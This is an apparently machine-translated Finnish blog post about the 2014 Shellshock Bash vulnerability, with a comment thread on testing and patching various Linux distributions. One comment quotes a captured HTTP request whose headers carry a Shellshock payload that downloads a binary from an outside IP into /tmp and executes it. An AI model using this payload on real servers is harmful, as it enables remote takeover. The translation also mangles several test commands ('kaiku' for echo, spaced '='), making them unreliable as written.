Joissakin blogeissa se toimii kuin kulo, tarina julkaistu turvallisuusblogi de Red Hat Bashissa löydetystä haavoittuvuudesta globaalien muuttujien väärinkäytön vuoksi. Alkuperäisten uutisten mukaan:
"... Haavoittuvuus johtuu siitä, että voit luoda ympäristömuuttujia erityisesti muotoilluilla arvoilla ennen kuin soitat bash-kuoreen. Nämä muuttujat voivat sisältää koodia, joka suoritetaan heti, kun kuori käynnistetään. Näiden muuttujien nimillä ei ole merkitystä, vain niiden sisällöllä. Tämän seurauksena tämä haavoittuvuus paljastuu monissa yhteyksissä, esimerkiksi:
- ForceCommand sitä käytetään sshd-kokoonpanoissa rajoitettujen komentojen suorittamisominaisuuksien tarjoamiseksi etäkäyttäjille. Tätä vikaa voidaan käyttää tämän välttämiseksi ja komentojen mielivaltaisen suorittamisen aikaansaamiseksi. Jotkut Git- ja Subversion-toteutukset käyttävät tällaisia rajoitettuja kuoria. Tämä ei vaikuta OpenSSH: n säännölliseen käyttöön, koska käyttäjillä on jo pääsy konsoliin.
- Tämä vaikuttaa Apache-palvelimeen, joka käyttää mod_cgi- tai mod_cgid-toimintoa, jos CGI-komentosarjat kirjoitetaan sekä bash- että spawn-alatasoilla. Tällaisia alatasoja käyttää implisiittisesti järjestelmä / popen C: ssä, os.system / os.popen Pythonissa, jos käytät system / exec-kuorta PHP: ssä (kun suoritetaan CGI-tilassa), ja open / system Perlissä (mikä riippuu komentosarjasta).
- Mod_php: llä suoritetut PHP-skriptit eivät vaikuta edes alatasoilla.
- DHCP-asiakkaat käyttävät shell-komentosarjoja järjestelmän konfiguroimiseksi, ja arvot otetaan mahdollisesti haitalliselta palvelimelta. Tämä mahdollistaisi mielivaltaisten komentojen suorittamisen, yleensä juurina, DHCP-asiakaslaitteella.
- Erilaiset SUID-oikeuksilla varustetut demonit ja ohjelmat voivat suorittaa komentosarjat käyttäjän asettamien / vaikuttamien ympäristömuuttuja-arvojen avulla, jolloin mielivaltaiset komennot voidaan suorittaa.
- Mikä tahansa muu sovellus, joka kiinnittää komentotulkin tai suorittaa komentosarjan komentosarjan, kuten bashin käyttäminen tulkkina. Shell-komentosarjat, jotka eivät vie muuttujia, eivät ole alttiita tälle ongelmalle, vaikka ne käsittelisivät epäluotettavaa sisältöä ja tallentavat sen kuorimuuttujat (vasen) ja alatasot auki.
... "
Kuinka tietää, onko Bashiin vaikuttanut?
Tämän vuoksi on hyvin yksinkertainen tapa tietää, koskeeko tämä haavoittuvuus meitä. Itse asiassa testasin Antergojani ja minulla ei ilmeisesti ole mitään ongelmaa. Meidän on avattava terminaali ja laitettava:
env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
Jos se tulee ulos tällä tavalla, meillä ei ole ongelmaa:
env x = '() {:;}; echo haavoittuva 'bash -c "kaiku tämä on testi" bash: varoitus: x: ohittaa funktion määrittelyyritys bash: virhe tuota funktion määritelmää x: lle tämä on testi
Jos tulos on erilainen, sinun on käytettävä ensisijaisten jakelumme päivityskanavia nähdäksesi, ovatko he jo asentaneet korjaustiedoston. Joten tiedät 😉
Päivitetty: Tämä on työtoverin ulostulo käyttäen Ubuntua 14:04:
env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi" haavoittuva tämä on testi
Kuten näette, toistaiseksi se on haavoittuva.
Minulla on Kubuntu 14.04 64: stä ja saan myös:
env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
haavoittuva
Tämä on testi
Olen jo päivittänyt, mutta se ei ole oikein. Mitä tehdä?
Odota, että ne päivittyvät. Jo eOS esimerkiksi päivitetty .. 😀
Kuinka outoa, minulla on myös Kubuntu 14.04
$ env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
bash: varoitus: x: ohittaa toiminnon määritysyrityksen
bash: virhe tuotaessa funktion määritelmää x: lle
Tämä on testi
Lisään, että tänään ladatun "bash" -paketin versio on:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
Minun tapauksessani komennon antaminen antaa minulle vain seuraavat terminaalissa:
>
Joka tapauksessa vitsi on se, että päivitin Debian Wheezyn ja se pudotti minut.
Wheezy on edelleen alttiina virheen toiselle osalle, ainakin iltapäiväksi (UTC -4: 30), ongelma oli edelleen seuraava: /
Vahvistin juuri, että päivityksen päivityksen jälkeen tänä aamuna Slackware, Debian ja Centos eivät vaikuta, koska he saivat vastaavan päivityksen.
Mikä tekee Ubuntusta edelleen haavoittuvan tällä hetkellä? Ja kerro minulle, että se on turvallista: D.
Mutta oletko yrittänyt päivittää Ubuntua?
Tämän päivän päivityksen myötä he ovat myös korjanneet sen.
OK
Turvallisuusasiantuntijat varoittavat Bashin haavoittuvuudesta, se voi olla suurempi uhka Linux-ohjelmiston käyttäjille kuin Heartbleed-virhe, jossa hakkerit voivat hyödyntää Bashin virhettä hallitakseen järjestelmän kokonaan.
Kyberturvallisuusyrityksen Rapid7: n insinööripäällikkö Tod Beardsley varoitti, että virhe oli luokiteltu 10 vakavuuden perusteella, mikä tarkoittaa, että sillä on suurin vaikutus, ja luokiteltu "matalaksi" hyödyntämisen monimutkaisuuden, mikä on suhteellisen helppoa hakkerihyökkäyksille. Tämän haavoittuvuuden avulla hyökkääjät voivat mahdollisesti hallita käyttöjärjestelmää, käyttää luottamuksellisia tietoja, tehdä muutoksia ja paljon muuta ", Beardsley kertoi. "Kaikkien, joilla on järjestelmät, jotka miehittävät Bashin, tulisi kiinnittää korjaustiedosto välittömästi", hän lisäsi.
ENNEN TÄTÄ VAKAVUUTTA, JOKA ESITTÄÄ VANHAA TYÖKALUA (GNU), jossa Bachia isännöidään, Linux-ohjelmistolle olisi helpompaa päästä eroon GNU: sta ja vaihtaa BSD-työkalua.
PS: ÄLÄ LUOKKAA sananvapauttani, ... ole loukannut ketään, ... älä poista viestiäni kuten edellinen viesti, jonka olen poistanut!
Ole hyvä, älä liioittele sitä. Kuinka vihaan niitä ihmisiä, jotka käyttävät BSD: tä ja halveksivat GNU: ta, Linuxia tai mitä tahansa näistä projekteista.
Olen kanssasi ja olet täysin oikeassa tämän aukon vakavuudessa.
Se ei ollut sensuuria, se oli irtisanomisia (olit tehnyt saman kommentin gnome 3.14 -viestissä)
«… Ja luokiteltu '' MATALAKSI '' hyväksikäytön monimutkaisuudelle, mikä tarkoittaa, että se on suhteellisen HELPOSTI hakkereiden hyökkäyksille»
Onko ristiriita havaittavissa?
Kuinka haavoittuvuuden hyödyntäminen voi olla helppoa ja samalla riski "alhainen", koska sen käyttö on niin monimutkaista?
Se on vika, joka on ratkaistu muutamassa tunnissa kokouksesta ja josta, kuten sydämestään, ei ole raportoitu siitä, että sitä olisi käytetty hyväksi (tietysti tällä on vähemmän aikaa tuntea toisensa).
Se on enemmän tabloidlehteä kuin todellista riskiä.
Näyttääkö @Staff sinulle merkityksetöntä? Mitä kerrot minulle nyt?
GET./.HTTP/1.0
.Käyttäjä-agentti: .Kiitos-Rob
.Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Viite: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Hyväksy:. * / *
$ tiedosto nginx
nginx: ELF 32-bittinen suoritettava LSB, Intel 80386, versio 1 (SYSV), staattisesti linkitetty, GNU / Linux 2.6.18: lle, poistettu
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256summa nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Tiedätkö mikä se on? Vähän vaarallista ...
Tilanne on melko vakava, mutta sieltä sanoa, että sinun pitäisi lopettaa bashin käyttö BSD-vaihtoehdoksi, se on jo yhtä paljon, päivitys on kuitenkin jo olemassa, kosketan vain päivitystä eikä mitään muuta.
Nyt PD, mielestäni se on enemmän kollega @robet, en usko, että täällä olevat järjestelmänvalvojat ovat omistautuneet tällaisten kommenttien poistamiseen, koska kyllä, koska koska olen osallistunut tähän yhteisöön, minulla on ollut tunne ja toivon, että se pysyy niin.
Tervehdys.
Laitoit täsmälleen saman kommentin kahteen eri viestiin. Jos yrität mainostaa tarinan "lähdettä", anteeksi, tämä ei ole oikea paikka.
Bash tulee Unixista (ja sen GNU-kloonista). Myös BSD-pohjaiset järjestelmät, kuten OSX, vaikuttavat, ja Genbetan mukaan he eivät ole vielä paikkaaneet sitä. Samoin Bashin käyttämiseen tarvitaan käyttäjätili, joko paikallinen tai SSH: n kautta.
@Työntekijä:
1.- Se luokitellaan tasolle 10 (vaaran enimmäistaso) johtuen palvelumäärästä, johon vika voi vaikuttaa. Päähuomautuksessa he tekevät tämän tosiasian hyvin selväksi väittäen, että vika voi vaikuttaa palveluihin, kuten apache, sshd, ohjelmiin, joilla on suid-oikeudet (mm.
2.- Se on luokiteltu alhaiseksi vaikeustasoksi, kun on kyse sen toteuttamisesta, ja paras esimerkki tästä on haavoittuvuustestiohjelma, jonka @elav on asettanut viestiin. Erittäin vaikea toteuttaa ei ole, kuten näette.
En näe redundanssia tiedoissa (näen vain Google-käännöksen) ja jos ongelma on melko vakava, ja kuten sanot, sillä on jo korjaustiedosto ja ratkaisu, mutta ei sitä varten, se ei ole enää riski, ja aivan todellinen .
@petercheco / @Yukiteru
Älä tulkitse minua väärin, mielestäni on selvää, että kritiikkini on uutinen, jonka Robet yhdistää ja keskittyy ristiriitaisuuteen eikä irtisanomiseen.
Samalla tavalla meidän on tehtävä ero riskin ja vaaran välillä (en mainitse jälkimmäistä), käytämme niitä yleisesti synonyymeinä, mutta tässä vaara olisi virheen vahingoittumiskyky ja riski sen esiintymisen todennäköisyydelle.
Minun tapauksessani tulin eilen. Se ei ollut postituslistoja tai vastaavaa varten, se oli tarkoitettu työpöydän jakelulle! Otin puhelimen ja lähetin viestin sysadminille, jossa oli linkki, ja vahvisti, että minulla on kaikki korjaustiedosto, anteeksi, mutta anteeksi, mutta nämä uutiset eivät pidä minua hereillä.
Muissa foorumeissa he mainitsevat Bash-haavoittuvuuden, "ratkaisun, jonka Debian ja Ubuntu julkaisivat", mutta tänään he havaitsivat, että heikkous on edelleen olemassa, joten ratkaisu oli puutteellinen, he mainitsevat sen!
Katson, että monet ovat arvostelleet minua siitä yksinkertaisesta tosiasiasta, että estän ihmisiä haavoittuvuuden vakavuudesta - joka on luokiteltu maksimaalisen vaarallisuuden tasolle 10, ja mainitsee mahdolliset ratkaisut Linux-ohjelmistoille ennen vanhentunutta GNU-työkalua, jossa Bash isännöi - mikä täysin GNU voisi korvata Linux-ohjelmiston BSD-työkalulla,… käytän myös Linuxia ja pidän Linuxista!
Selvennän, että Bashia ei ole oletusarvoisesti asennettu BSD: hen, se on vielä yksi Linux-yhteensopivuuspaketti, joka voidaan asentaa BSD: hen ... kyllä! Lähde on asetettu niin, että he voivat tarkistaa uutiset, koska monet käyttäjät eivät joskus usko viestiä tai kommentteja.
robet: Kuten he kertoivat sinulle jo uudestaan ja uudestaan, olet jo lisännyt kommenttisi uutisten kanssa viestiin, sinun ei tarvitse laittaa sitä kaikkiin kommentteihisi.
Bashissa on muita kuoria, joita voidaan käyttää, jos Bash on haavoittuva. 😉
Robet, että tiedän, ettei ole mitään ohjelmistoa, joka yhdistää linux-ytimen BSD-käyttömaan kanssa. Lähin asia on päinvastoin, kBSD + GNU, kuten Gentoo ja Debian tekevät. Lisäksi GNU: ta (1983) ei voida kutsua "vanhanaikaiseksi", jos se on BSD: n (1977) jälkeen. He molemmat jakavat unix-juurensa (mutta eivät koodia), "Linux-yhteensopivuutta" ei olisi, jos Bash luotiin Linus T: n ollessa vielä lapsi.
ui, debian-testaus on tällä hetkellä "haavoittuva" mikä putki meillä on ...
Käytän Debian-testausta ja jopa tässä haarassa olemme saaneet bash-päivityksen
genbetan mukaan on myös toinen haavoittuvuus
http://seclists.org/oss-sec/2014/q3/685
käsky kuulla on
env X = '() {(a) => \' sh -c "kaiun haavoittuvuus"; bash -c "kaiun epäonnistuminen 2 unspatched"
sama minä.
Sama täällä. Mutta viestin alkuperäinen vika korjattiin (L) Ubuntu 14.04: ssä
Sen sijaan, että yritän suorittaa yksinkertaisen kaikun, jotta se toteuttaisi käyttöoikeuksia vaativan käskyn, heitän "riittämättömät oikeudet" ... tämä vika ei lisää oikeuksia? Jos se ei lisää oikeuksia, se ei ole niin vaarallinen kuin ne maalataan.
Olet oikeassa!! ne olivat kaksi haavoittuvuutta ...
Minulle Linux Mint 17: ssä toisen bash-päivityksen jälkeen, jonka he asettivat Ubuntun tietovarastoihin viime yönä, kun komento suoritetaan, shell tarjoaa tämän lähdön:
env X = '() {(a) => \' sh -c "kaiun haavoittuvuus"; bash -c "echo Fail 2 unpatched"
>
Bassh-versio, joka laitettiin Ubuntun tietovarastoihin päivittämään edelliset, on:
4.3-7ubuntu1.2
Debian-johdetuissa järjestelmissä voit tarkistaa asennetun version tällä komennolla:
dpkg -s bash | grep -versio
Joka tapauksessa se on selvitettävä ainakin Debianin, Ubuntu ja Mint -käyttäjille; Sinun ei pitäisi huolehtia liikaa ohjelmista, jotka suorittavat komentosarjoja #! / Bin / sh -otsakkeella, koska niissä jakeluissa bin / sh ei kutsu "bash", mutta sitoutuu kuoreen "viiva" (viiva on :)
Debianin alkemistikonsoli (viiva) on johdettu POSIX-konsoli
tuhkaa.
.
Koska se suorittaa komentosarjoja nopeammin kuin bash, ja sillä on vähemmän riippuvuuksia
- kirjastoista (mikä tekee siitä vankemman ohjelmistohäiriöitä tai
laitteisto), sitä käytetään järjestelmän oletuskonsolina
Debian.
Joten, ainakin Ubuntussa, "bash" käytetään kuorena käyttäjän kirjautumiselle (myös pääkäyttäjälle). Mutta kuka tahansa käyttäjä voi käyttää oletuksena toista kuorta käyttäjälle ja juurikonsoleille (päätelaitteille).
On helppo tarkistaa, että komentotulkki suorittaa komentosarjat (#! / Bin / sh) suorittamalla nämä komennot:
tiedosto / bin / sh
(lähtö on / bin / sh: symbolinen linkki viivaan) seuraamme jälkeä toistamalla komennon
tiedosto / bin / viiva
(lähtö on / bin / dash: ELF 64-bittinen jaettu LSB-objekti, x86-64, versio 1 (SYSV), joten tämä on suoritettava tiedosto.
Nämä ovat tulokset Linux Mint 17. -jakelusta. Muissa muissa kuin Ubuntu / Debian-pohjaisissa jakeluissa ne voivat olla erilaisia.
Oletuskuoren vaihtaminen ei ole vaikeaa! Voit jopa käyttää eri käyttäjille ja pääkäyttäjille. Itse asiassa sinun tarvitsee vain asentaa haluamasi kuori ja muuttaa oletusarvo komennolla "chsh" tai muokkaamalla tiedostoa / etc / passwd (vaikka käyttäjät, jotka eivät tiedä virheen seurauksia "passwd" -tiedostoa muokattaessa, on Parempi ilmoittaa itsellesi hyvin ja tehdä kopio alkuperäisestä ennen sen muokkaamista, jos se on tarpeen palauttaa).
Minusta tuntuu mukavammalta "tcsh" (tcsh on :)
TENEX C -konsoli, parannettu versio Berkeley csh: stä
"Csh" on se, mitä Mac OS X käytti muutama vuosi sitten. Mikä on järkevää, kun otetaan huomioon, että suuri osa Applen käyttöjärjestelmästä on FreeBSD-koodi. Nyt eilen lukemastani näyttää siltä, että ne tarjoavat myös "bash" käyttäjän päätelaitteille.
PÄÄTELMÄT:
- Korjatut "bash" -versiot eniten käytettyihin jakeluihin "on jo jaettu
- "bash" 4.3-7ubuntu1.2: n ja uudempien versio ei sisällä näitä vikoja
- "bash" -toiminnon käyttö ei ole pakollista OS * Linuxissa
- Muutama * Linux-jakelulinkki linkittää #! / Bin / sh ja "bash"
- On olemassa vaihtoehtoja: tuhka, viiva, csh, tcsh ja jotkut muut
- Ei ole monimutkaista muuttaa oletuskuorta, jonka järjestelmä kutsuu avattaessa päätelaitteen
- Harvat pienet laitteet (reitittimet ja muut) käyttävät "bash", koska se on erittäin iso!
Juuri nyt on saapunut uusi päivitys, joka asentaa toisen version "bash" 4.3-7ubuntu1.3
Linux Mint 17 ja Ubuntu 14.04.1 LTS
ArchLinux tuli versioon bash-4.3.026-1
@ Xurxo… .csh Berkeleyltä?, ... Ymmärrät jotain siitä, mitä puhun yllä, ja on parempi käyttää BSD: n “csh”: ta ... sen vanhan GNU-työkalun sijaan, jossa Bash isännöi. Tämä työkalu on paras Linux-ohjelmistolle.
Luulen, että tämä on vika
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
totta?
Ja mikä olisi ratkaisu?
Odota, että he päivittävät pakettisi distroosi 😉
Virhe kastettiin koteloksi
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
haavoittuva
Tämä on testi
Ei vielä korjaustiedostoa Ubuntu Studio 14.04: lle
Korjattu Ubuntu Studio 14.04.1: ssä
wisp @ ubuntustudio: ~ $ env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
bash: varoitus: x: ohittaa toiminnon määritysyrityksen
bash: virhe tuotaessa funktion määritelmää x: lle
Tämä on testi
Itse asiassa se on pieni haavoittuvuus, jos se vaikuttaa sinuun, se on, että teit jotain väärin aiemmin ...
Koska juurioikeuksilla suoritettavaa bash-komentosarjaa ei pitäisi koskaan altistaa käyttäjälle. Ja jos hän juoksee ilman etuoikeuksia, tällaista pullistuvuutta ei ole. Itse asiassa se on hölynpölyä. Paljon pelottavaa.
Olen samaa mieltä.
Nämä viat ovat hyviä, jos haluat myydä enemmän sanomalehtiä tai saada enemmän vierailuja.
Mutta he unohtavat aina mainita, että jotta kompromissi tietokoneesta tällaisilla skripteillä, sinulla on ensin oltava pääsy bashiin ja sitten sen root.
henkilökunta, jos käytät apache-ohjelmaa cgi: n kanssa, laita vain http-otsikot evästeiksi tai ohjaa suoritettava toiminto. Sitä on käytetty jopa matojen levittämiseen.
ja jos joku laittaa kuoren palvelimelle wget mishell.php: llä, siinä tapauksessa se ei ole vakavaa, eikö niin?
Samaa mieltä kanssasi. Luulin, että se oli valtava vika kuin Heartbleedissä (jopa NSA lainasi itsensä polttoaineeksi sairastuvuuteen), mutta loppujen lopuksi se oli pieni virhe.
On muitakin todella vakavia vikoja, kuten Flashin hullu kulutus ja Pepper Flash Playerin suorituskyvyn heikkeneminen, ja joka on jo korjattu webRTC-vika Chromessa ja Firefoxissa.
Tiedätkö, onko siinä järjestely ihmisille, joilla on Linux Mint 16?
Debianin testauksessa se oli jo korjattu.
Viidessä distrossani se on ratkaistu, OS X: ssäni en tiedä.
Älä sensuroi kommenttini, sanoin OS X. En tiedä, voitko sanoa OS X: n tällä sivustolla.
@yoyo no, älä unohda sitä liikaa, että he työskentelevät edelleen joitain korjaustiedoston yksityiskohtia ... kokeile tätä ja kerro sitten miten XD: stä
env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku Olen haavoittuvampi kuin iphone 6 roskakori"
Jos he ovat ratkaisseet sen 100% ennen OS X: ää, lyön vetoa mistä tahansa
No, jopa Ars Technicassa, ne antavat merkityksen Bashille OSX: ssä.
@Yoyo seuraava kommentti OS X: stä SPAM: lle .. lla tu save .. 😛
@yoyo korjata lainaukset ... mutta loput tiedät 😉
FSF on puhunut
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Kuten heistä olisi tullut holhoavia OSX: n kanssa (koska OSX käyttää edelleen Bash: v: ää).
Joka tapauksessa minun ei tarvitse sekailla Debian Jessiea niin paljon.
Jos järjestelmä on haavoittuva Cent OS: ssä:
puhdista kaikki && yum update bash
nähdäksesi bash-version:
rpm -qa | grep bash
Jos versio on aikaisempi kuin bash-4.1.2-15.el6_5.1, järjestelmäsi voi olla haavoittuva!
Tervehdys.
2. haavoittuvuutta ei ole vielä ratkaistu
env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "kaiun epäonnistuminen 2 unspatched"
Päivitetään ...
Minulle tapahtuu Gentoon päinvastoin, olen vain altis ensimmäiselle epäonnistumiselle, mutta toisen saan tämän:
[koodi] sh: X: rivi 1: syntaktinen virhe odottamattoman elementin lähellä = =
sh: X: rivi 1: ''
sh: virhe tuotaessa funktion määritelmää X: lle
sh: haavoittuva: komentoa ei löydy
Virhettä 2 ei korjata
[/ Code]
En tiedä, onko Bashista jo vakaa versio korjatuilla virheillä, mutta jompikumpi tapauksista odottaa seuraavaa kerta, kun teen emerge –sync && emerge –update –deep –with-bdeps = ja - newuse @world (näin päivitän koko järjestelmän).
Minulla on Gentoo versiolla 4.2_p50 ja toistaiseksi se on läpäissyt kaikki testit. Kokeile esiin tulemista –sync ja sitten emerge -av1 app-shells / bash ja tarkista sitten, että sinulla on versio 4.2_p50 käyttämällä komentoa bash –version.
Oletko kokeillut tätä?
Uusien pakettien, uuden testin, jonka Red Hat tarjoaa meille
cd / tmp; rm -f / tmp / kaiku; env 'x = () {(a) => \' bash -c "kaikupäivä"; kissa / tmp / kaiku
Jos järjestelmämme ei ole haavoittuva ja se on korjattu oikein, sen on annettava meille jotain tällaista
1-päivämäärä
2 cat: / tmp / echo: Tiedostoa tai hakemistoa ei ole olemassa
Kokeile näin:
env X = '() {(a) => \' sh -c "kaiun haavoittuvuus"; bash -c "kaiku epäonnistui 2 korjattu"
saan
haavoittuva
Vika 2 korjattu.
Unohda se, viiva on huonosti muotoiltu.
Erinomainen! Tein jo päivityksen Slackware-laitteelleni, kiitos!
Hei, herää kysymys, minulla on useita palvelimia, joissa on 10-bittinen "SUSE Linux Enterprise Server 64".
Kun suoritan komennot, jotka olen haavoittuva, olen jopa haavoittuvampi kuin iPhone 6 xD: n roskakori
Jos en ole väärässä päivittämällä / asentamalla paketteja SUSE: ssa, se tehdään komennolla «zypper».
Joillakin palvelimilla se kertoo minulle tämän:
BIAL: ~ # vetoketju ylös
-bash: zypper: komentoa ei löydy
BIAL: ~ #
Ja muissa tämä:
PK: ~ # vetoketju ylös
Palautetaan järjestelmän lähteitä ...
Jäsennetään SUSE Linux Enterprise Server 10 SP2-20100319-161944 -metatietoja ...
Jäsennetään RPM-tietokantaa ...
Yhteenveto:
Ei mitään tehtävää.
Mitä teen?
Tiedän, että joidenkin mielestä haavoittuvuus on pienempi kuin mitä he maalavat, mutta minulla on se, enkä halua altistua pienille tai suurille riskeille.
Tervehdys.
Hyvää iltaa, olen yrittänyt liittää koodin, jonka annoit artikkelissa, saan tämän
hiomakoneet @ pc-hiomakoneet: ~ $ env x = '() {:;}; kaiku haavoittuva 'bash -c "kaiku tämä on testi"
Tämä on testi
hiomakoneet @ pc-hiomakoneet: ~ $
Selittäisittekö minulle, kuinka korjata korjaus, päivitän päivittäin ja en näe muutoksia kehotteen tuotoksessa.
Kiitos paljon!